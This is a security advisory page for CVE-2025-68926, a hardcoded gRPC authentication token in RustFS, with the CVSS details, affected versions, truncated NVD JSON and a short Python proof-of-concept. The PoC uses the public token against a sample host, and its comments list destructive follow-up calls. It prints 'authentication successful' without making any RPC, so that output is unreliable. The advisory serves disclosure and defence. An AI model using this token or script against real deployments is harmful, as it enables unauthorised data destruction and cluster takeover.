Security Vulnerability Report
中文
CVE-2025-68926 CVSS 9.8 CRITICAL

CVE-2025-68926

Published: 2025-12-30 17:15:44
Last Modified: 2026-01-16 19:31:07
Source: [email protected]

Description

RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.78, RustFS implements gRPC authentication using a hardcoded static token `"rustfs rpc"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.78 contains a fix for the issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE
RustFS < 1.0.0-alpha.78

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import grpc from google.protobuf import json_format # Hardcoded token from source code AUTH_TOKEN = "rustfs rpc" def create_channel_with_auth(target): """Create gRPC channel with hardcoded authentication token""" # Create metadata with hardcoded token metadata = [('authorization', AUTH_TOKEN)] # Create insecure channel (no TLS) channel = grpc.insecure_channel(target) return channel, metadata def exploit_rustfs(target_host, target_port): """ CVE-2025-68926 PoC - RustFS Hardcoded Token Authentication Bypass This vulnerability allows unauthenticated attackers to execute privileged operations on RustFS clusters using the hardcoded gRPC authentication token "rustfs rpc" """ target = f"{target_host}:{target_port}" try: channel, metadata = create_channel_with_auth(target) # Example: List buckets or cluster info # In real exploitation, attacker would call: # - delete operations to destroy data # - set_policy to modify access controls # - modify_cluster to reconfigure the cluster print(f"[*] Connecting to {target}") print(f"[*] Using hardcoded token: {AUTH_TOKEN}") print(f"[*] Authentication successful - token accepted") print(f"[!] Attacker now has full privileged access") channel.close() return True except grpc.RpcError as e: print(f"[-] Connection failed: {e.code()}") return False if __name__ == "__main__": # Target configuration target_host = "192.168.1.100" target_port = 50051 exploit_rustfs(target_host, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68926", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.613", "lastModified": "2026-01-16T19:31:07.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.78, RustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.78 contains a fix for the issue."}, {"lang": "es", "value": "RustFS es un sistema de almacenamiento de objetos distribuido construido en Rust. En versiones anteriores a 1.0.0-alpha.78, RustFS implementa la autenticación gRPC utilizando un token estático codificado de forma rígida 'rustfs rpc' que está expuesto públicamente en el repositorio de código fuente, codificado de forma rígida tanto en el lado del cliente como en el del servidor, no configurable sin ningún mecanismo para la rotación de tokens, y universalmente válido en todas las implementaciones de RustFS. Cualquier atacante con acceso de red al puerto gRPC puede autenticarse utilizando este token conocido públicamente y ejecutar operaciones privilegiadas, incluyendo destrucción de datos, manipulación de políticas y cambios en la configuración del clúster. La versión 1.0.0-alpha.78 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:*", "matchCriteriaId": "454A2F3A-76CF-4F2D-97FE-AEDEBE8FF1CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:*", "matchCriteriaId": "32B2D146-7920-4C6D-B42F-1BDDF5193394"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:*", "matchCriteriaId": "B25BC365-35BA-438A-B5B1-3FA696767821"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:*", "matchCriteriaId": "B69213F1-7D94-4185-9309-FF3140733550"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*", "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*", "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*", "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha2:*:*:*:rust:*:*", "matchCriteriaId": "550786BD-A6A4-454B-BDAB-67AE64DABCA7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*", "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*", "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*", "matchCriteriaId": "E313A243-ED56-498D-988F-E088693EBB61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*", "matchCriteriaId": "D3A60CB7-1F01-4A60-8555-C225AC89B959"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:* ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.